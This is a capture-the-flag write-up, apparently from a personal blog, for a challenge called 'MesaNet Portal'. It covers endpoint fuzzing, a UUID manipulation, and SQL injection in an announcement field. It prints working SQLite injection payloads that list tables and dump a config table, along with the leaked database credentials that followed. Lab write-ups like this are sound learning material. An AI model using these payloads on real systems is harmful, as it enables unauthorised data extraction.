search

MesaNet Portal

This weekly was intense, super fun and came with the very useful hint ¯\_(ツ)_/¯

After exploring the app, I went to my proxy history, there I found that the functionality

went through an endpoint /gateway

Well, if it was gonna be that easy, I would not have signed up for it, so I obviously tried reaching /admin .

Ok, maybe a not so straightforward...

Ok maybe not so easy... 😂

Then I tried an uuid-attack, essentially the id will be changed to all 0's

Interesting finding! But what the hell is Rail endpoint? I tried different things, but I always ended up with Rail endpoint not found .

So I tried fuzzing it. I usually start fuzzing with common.txt from SecLists.

Got a hit, and creating stuff seems very fun to me if we're being honest.

Ok, I could create an announcement. But what now. Here I spend a very good amount on feeling lost, that was until I tried adding a ' to the message.

Only explanation was SQLi... So maybe...

Yes! With the payload ' || (SELECT group_concat(name) FROM sqlite_master WHERE type='table') || ‘ I was able to enumerate the tables. config was the table that caught my attention.

With ' || (SELECT group_concat(key || ':' || value) FROM config) || ‘ is was able to find some db credentials! dbadmin:Xen_Lambda_R4ilSyst3m_2024!Cr0ss1ng went straight to my notes. So I was looking for a database. I realized I haven't got around to fuzz the base app, so maybe this was a good moment for that.

Well look at that, a db and a dev environment. For funzies, let's check out the db.

Taking backups from a database? Don't mind if I do, but which one? Again is fuzzing the answer!

Got a hit on portal and rail

I downloaded portal and went to an online SQLight viewer. There I found an OTP (One Time Password) for a dev!

Well, we already found the /dev endpoint, so maybe it was time to go over there.

Apparently, the one time code changed every minute! So I needed to be somewhat creative with my screens, because I hadn't hooked up my second monitor.

But eventually I was able to provide the correct password within the time-frame and got my flag 🇧🇪

PreviousGalaxy Dash - JWT ForgeryNextGalaxy Dash - XSS

Last updated